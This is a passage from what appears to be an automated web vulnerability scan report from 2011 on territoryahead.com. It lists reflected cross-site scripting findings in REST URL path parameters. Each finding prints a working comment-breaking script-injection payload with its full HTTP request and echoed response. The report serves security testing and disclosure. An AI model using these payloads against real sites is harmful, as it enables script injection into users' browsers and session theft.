Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:26:53 GMT
Server: Apache
ETag: "AAAAS53/mkO"
Last-Modified: Wed, 02 Mar 2011 19:14:45 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381267; Path=/; Expires=Wed, 16-Mar-2011 19:14:44 GMT
Set-Cookie: customer=92645295; Path=/; Expires=Thu, 28-Feb-2019 19:14:44 GMT
Set-Cookie: mmlID=68410017; Path=/; Expires=Thu, 28-Feb-2019 19:14:44 GMT
Set-Cookie: JSESSIONID=cKxpSWibsLxe; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
RECT_UNIQUE_ID: 5Tb0v6wSrSgAAAIpggsAAAAJ
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text3e903--><script>alert(1)</script>05a8b0354fb/css/tta_stylesheet_ie7.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text3e903-->
...[SNIP]...

1.50. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/css/tta_stylesheet_ie7.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b6d61--><script>alert(1)</script>2033e9dffd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cssb6d61--><script>alert(1)</script>2033e9dffd6/tta_stylesheet_ie7.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:17:49 GMT
Server: Apache
ETag: "AAAAS53/BL6"
Last-Modified: Wed, 02 Mar 2011 19:12:12 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381459; Path=/; Expires=Wed, 16-Mar-2011 19:12:11 GMT
Set-Cookie: customer=92645631; Path=/; Expires=Thu, 28-Feb-2019 19:12:11 GMT
Set-Cookie: mmlID=68409929; Path=/; Expires=Thu, 28-Feb-2019 19:12:11 GMT
Set-Cookie: JSESSIONID=ezBIbztmGMC4; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
_UNIQUE_ID: xMJlyKwSrRQAAG-3DioAAAAA
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/cssb6d61--><script>alert(1)</script>2033e9dffd6/tta_stylesheet_ie7.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cssb6d61-->
...[SNIP]...

1.51. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/css/tta_stylesheet_ie7.css

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload fbd0e--><script>alert(1)</script>53a79b9814f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/css/tta_stylesheet_ie7.cssfbd0e--><script>alert(1)</script>53a79b9814f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:17:52 GMT
Server: Apache
ETag: "AAAAS53/CEF"
Last-Modified: Wed, 02 Mar 2011 19:12:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381472; Path=/; Expires=Wed, 16-Mar-2011 19:12:15 GMT
Set-Cookie: customer=92645644; Path=/; Expires=Thu, 28-Feb-2019 19:12:15 GMT
Set-Cookie: mmlID=68409942; Path=/; Expires=Thu, 28-Feb-2019 19:12:15 GMT
Set-Cookie: JSESSIONID=e-KL377LcFYf; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
AAG-4D0UAAAAE
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/css/tta_stylesheet_ie7.cssfbd0e--><script>alert(1)</script>53a79b9814f
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/css/tta_stylesheet_ie7.cssfbd0e-->
...[SNIP]...

1.52. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/displayfunctions.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f47e2--><script>alert(1)</script>f2a49a5e572 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textf47e2--><script>alert(1)</script>f2a49a5e572/js/displayfunctions.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:42 GMT
Server: Apache
ETag: "AAAAS53+/d5"
Last-Modified: Wed, 02 Mar 2011 19:12:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: xFicX6wSrRQAAHa3-lwAAAAB
REDIRECT_SCRIPT_URL: /textf47e2--><script>alert(1)</script>f2a49a5e572/js/displayfunctions.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textf47e2-->
...[SNIP]...

1.53. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/displayfunctions.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b4da4--><script>alert(1)</script>2a78501926d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/jsb4da4--><script>alert(1)</script>2a78501926d/displayfunctions.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:47 GMT
Server: Apache
ETag: "AAAAS53/At4"
Last-Modified: Wed, 02 Mar 2011 19:12:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: xKa4oqwSrRQAAE0Z@0wAAAAa
REDIRECT_SCRIPT_URL: /text/jsb4da4--><script>alert(1)</script>2a78501926d/displayfunctions.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/jsb4da4-->
...[SNIP]...

1.54. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/displayfunctions.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d345f--><script>alert(1)</script>4243aff53cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/displayfunctions.jsd345f--><script>alert(1)</script>4243aff53cb HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:57 GMT
Server: Apache
ETag: "AAAAS53/BSr"
Last-Modified: Wed, 02 Mar 2011 19:12:12 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
er=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5XjQVKwSrSgAAGQkseUAAAAa
REDIRECT_SCRIPT_URL: /text/js/displayfunctions.jsd345f--><script>alert(1)</script>4243aff53cb
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/displayfunctions.jsd345f-->
...[SNIP]...

1.55. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cee51--><script>alert(1)</script>87881568124 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textcee51--><script>alert(1)</script>87881568124/js/jquery-1.5.1.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:13 GMT
Server: Apache
ETag: "AAAAS53/rcY"
Last-Modified: Wed, 02 Mar 2011 19:15:05 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381737; Path=/; Expires=Wed, 16-Mar-2011 19:15:04 GMT
Set-Cookie: customer=92645867; Path=/; Expires=Thu, 28-Feb-2019 19:15:04 GMT
Set-Cookie: mmlID=68410088; Path=/; Expires=Thu, 28-Feb-2019 19:15:04 GMT
Set-Cookie: JSESSIONID=c1RnauRFdO8g; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
RECT_UNIQUE_ID: 5mfrXawSrSgAAGQisGUAAAAT
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /textcee51--><script>alert(1)</script>87881568124/js/jquery-1.5.1.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textcee51-->
...[SNIP]...

1.56. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 42049--><script>alert(1)</script>85b8a825579 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js42049--><script>alert(1)</script>85b8a825579/jquery-1.5.1.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:18:13 GMT
Server: Apache
ETag: "AAAAS53/8tr"
Last-Modified: Wed, 02 Mar 2011 19:16:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381836; Path=/; Expires=Wed, 16-Mar-2011 19:16:15 GMT
Set-Cookie: customer=92646026; Path=/; Expires=Thu, 28-Feb-2019 19:16:15 GMT
Set-Cookie: mmlID=68410143; Path=/; Expires=Thu, 28-Feb-2019 19:16:15 GMT
Set-Cookie: JSESSIONID=dUY9_9HSu3R5; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
T_UNIQUE_ID: xjj7H6wSrRQAAHbc-D8AAAAS
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/js42049--><script>alert(1)</script>85b8a825579/jquery-1.5.1.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js42049-->
...[SNIP]...

1.57. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 86d5a--><script>alert(1)</script>8b488278074 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/jquery-1.5.1.min.js86d5a--><script>alert(1)</script>8b488278074 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:25 GMT
Server: Apache
ETag: "AAAAS53/9ni"
Last-Modified: Wed, 02 Mar 2011 19:16:19 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381855; Path=/; Expires=Wed, 16-Mar-2011 19:16:19 GMT
Set-Cookie: customer=92646045; Path=/; Expires=Thu, 28-Feb-2019 19:16:19 GMT
Set-Cookie: mmlID=68410162; Path=/; Expires=Thu, 28-Feb-2019 19:16:19 GMT
Set-Cookie: JSESSIONID=dypnxLcnDSYf; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
SrSgAAF3TGMMAAAAs
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/js/jquery-1.5.1.min.js86d5a--><script>alert(1)</script>8b488278074
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/jquery-1.5.1.min.js86d5a-->
...[SNIP]...

1.58. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6e8f--><script>alert(1)</script>4dd4fea7c94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /texte6e8f--><script>alert(1)</script>4dd4fea7c94/js/jquery.cycle.all.min.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:15 GMT
Server: Apache
ETag: "AAAAS53+46D"
Last-Modified: Wed, 02 Mar 2011 19:11:38 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wr6aQ6wSrRQAAFhQzMgAAAA7
REDIRECT_SCRIPT_URL: /texte6e8f--><script>alert(1)</script>4dd4fea7c94/js/jquery.cycle.all.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/texte6e8f-->
...[SNIP]...

1.59. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload e4838--><script>alert(1)</script>8bb0c9363f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/jse4838--><script>alert(1)</script>8bb0c9363f6/jquery.cycle.all.min.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:17 GMT
Server: Apache
ETag: "AAAAS53+5fK"
Last-Modified: Wed, 02 Mar 2011 19:11:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wuLYKawSrRQAAG-6D30AAAAR
REDIRECT_SCRIPT_URL: /text/jse4838--><script>alert(1)</script>8bb0c9363f6/jquery.cycle.all.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/jse4838-->
...[SNIP]...

1.60. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload a84c1--><script>alert(1)</script>623c86cdf9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/jquery.cycle.all.min.jsa84c1--><script>alert(1)</script>623c86cdf9f HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:20 GMT
Server: Apache
ETag: "AAAAS53+6ID"
Last-Modified: Wed, 02 Mar 2011 19:11:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
2379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wwrI0awSrRQAAC9kmrQAAAAN
REDIRECT_SCRIPT_URL: /text/js/jquery.cycle.all.min.jsa84c1--><script>alert(1)</script>623c86cdf9f
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/jquery.cycle.all.min.jsa84c1-->
...[SNIP]...

1.61. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/sitedisplay.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 22f59--><script>alert(1)</script>1498ec5cbb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text22f59--><script>alert(1)</script>1498ec5cbb8/js/sitedisplay.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:47 GMT
Server: Apache
ETag: "AAAAS53+jbL"
Last-Modified: Wed, 02 Mar 2011 19:10:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vX-alawSrRQAAFi69mIAAACx
REDIRECT_SCRIPT_URL: /text22f59--><script>alert(1)</script>1498ec5cbb8/js/sitedisplay.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text22f59-->
...[SNIP]...

1.62. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/js/sitedisplay.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7c6fe--><script>alert(1)</script>ab2c0cac3d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js7c6fe--><script>alert(1)</script>ab2c0cac3d8/sitedisplay.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:58 GMT
Server: Apache
